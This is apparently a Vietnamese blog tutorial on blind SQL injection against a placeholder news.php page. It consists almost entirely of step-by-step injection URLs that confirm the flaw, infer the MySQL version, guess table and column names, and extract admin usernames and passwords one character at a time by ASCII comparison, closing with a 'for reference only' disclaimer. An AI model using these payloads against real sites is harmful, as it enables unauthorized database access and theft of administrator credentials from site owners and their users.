1. Check lỗi
www.site.com/news.php?id=1 and 1=1 * bình thường
www.site.com/news.php?id=1 and 1=2 * giao diện site thay đổi
=> dính lỗi
2. Check version của database
www.site.com/news.php?id=1 and substring(@@version,1,1)=4 * site load không bình thường
www.site.com/news.php?id=1 and substring(@@version,1,1)=5 * site load bình thường
=> version 5
3. Check tên tables
ở bước này chúng ta sẽ phải đoán tên tables, và check xem tên tables chúng ta đoán có đúng hay không @_@
Ví dụ mình đoán nó có 2 tables là: user, admin giờ mình check xem đoán có đúng hay không
www.site.com/news.php?id=1 and (SELECT 1 from user limit 0,1)=1 * site load bình thường
www.site.com/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1 * site load bình thường
=> site load bình thường như vậy là đã đoán đúng tên tables rồi
4. Get column
Như bước trên chúng ta cũng phải đoán. Ở đây sẽ get tables admin và đoán các column là: username, password
Tiến hành check
www.site.com/news.php?id=1 "(SELECT substring(concat(1,username),1,1) from admin limit 0,1)=1" * site load bình thường
www.site.com/news.php?id=1 "(SELECT substring(concat(1,password),1,1) from admin limit 0,1)=1" * site load bình thường
=> site load bình thường như vậy là đã đoán đúng
5. Get username và pass
cũng phải đoán luôn =)) cấu trúc querry như sau:
and ascii(substring((SELECT concat(tên-cloumn) from tên-tables),CHARACTER NUMBER,1))>ASCII VALUE HERE
ví dụ:
and ascii(substring((SELECT concat(user) from admin),1,1))>97
Nếu site load bình thường nghĩa là đã đoán đùng và mã ASCII 97 tương ứng với chữ: a
p/s: nói chung tut này chỉ có tác dụng tham khảo là chính @_@
Các thánh lech vui lòng đề nguồn
Đăng nhận xét Blogger Facebook